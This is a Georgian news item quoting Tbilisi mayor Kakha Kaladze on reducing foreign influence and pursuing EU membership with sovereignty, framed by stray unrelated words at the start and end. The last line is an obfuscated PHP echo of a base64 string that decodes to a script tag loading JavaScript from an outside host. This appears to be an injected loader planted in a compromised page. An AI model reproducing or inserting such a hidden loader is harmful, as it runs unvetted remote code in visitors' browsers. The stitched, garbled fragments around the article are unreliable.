celsiusi
ავერსი შნაიდერი

უნდა შემცირდეს უცხოური გავლენა და გაიზარდოს ჩვენი ხალხის გავლენა ჩვენს ქვეყანაზე, - ამის შესახებ თბილისის მერმა, კახა კალაძემ თბილისის მთავრობის დღევანდელ სხდომაზე განაცხადა.

ის 29 აპრილს სახალხო შეკრებას გამოეხმაურა და აღნიშნა, რომ „ამ ღირსებით მიგვიღებენ ზუსტად ევროკავშირში და გავხდებით ღირსეული წევრები“.

„ვნახეთ, რომ მართლაც მთელი საქართველო, მთელი თბილისი იდგა რუსთაველის გამზირზე. ესენი არიან გულანთებული ადამიანები, ვისაც უყვარს თავისი ქვეყანა, თავისი სამშობლო. ეს დამოკიდებულება ჩვენ ყველამ ვნახეთ, რაც აქვს ჩვენი ქვეყნის მოსახლეობის უმრავლესობას. მინდა ერთ რამეს გავუსვა ხაზი, ამ ქვეყნის პატრონები და ბატონები არის ჩვენი ქვეყნის მოსახლეობა და არა რომელიმე კონკრეტული ძალა ქვეყნის გარედან ან ქვეყნის შიგნით. როდესაც ვსაუბრობთ იმაზე, რომ უცხოური გავლენა უნდა შემცირდეს ქვეყანაში, რა თქმა უნდა, ამაში იგულისხმება ყველა უცხოური გავლენა. უნდა შემცირდეს უცხოური გავლენა და გაიზარდოს ჩვენი ხალხის გავლენა ჩვენს ქვეყანაზე, ჩვენს სამშობლოზე, ეს არის ჩვენი დამოკიდებულება. არაერთხელ გვითქვამს და კიდევ ერთხელ გავიმეორებ, რომ ჩვენი მიზანი არის ევროინტეგრაცია, ევროპული მომავალი, მაგრამ ეს ყველაფერი გვინდა გავაკეთოთ ღირსებით, სუვერენიტეტის დაცვით, ჩვენი სახელმწიფოებრიობით და პირდაპირ ვიტყვი, უცხოური გავლენის შემცირებით. ჩვენ ასეთ საქართველოს ვხედავთ, ასე წარმოგვიდგენია ჩვენი ქვეყნის სიძლიერე, განვითარება, ძლიერი ეკონომიკა, ძლიერი სუვერენიტეტი, გამყარებული სახელმწიფოებრიობა, სხვანაირად შეუძლებელია იყო ღირსეული წევრი იმ ოჯახის, რომელსაც ევროპა ჰქვია. იქაც ღირსეულები, ძლიერი სახელმწიფოები სჭირდებათ. პირველ რიგში, ჩვენ უნდა გადავდგათ ნაბიჯები. ჩვენს გასაკეთებელს არავინ გააკეთებს, რომ გავაძლიეროთ ჩვენი სამშობლო. ამ ღირსებით მიგვიღებენ ზუსტად ევროკავშირში და გავხდებით ღირსეული წევრები“, - განაცხადა კალაძემ.

201
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");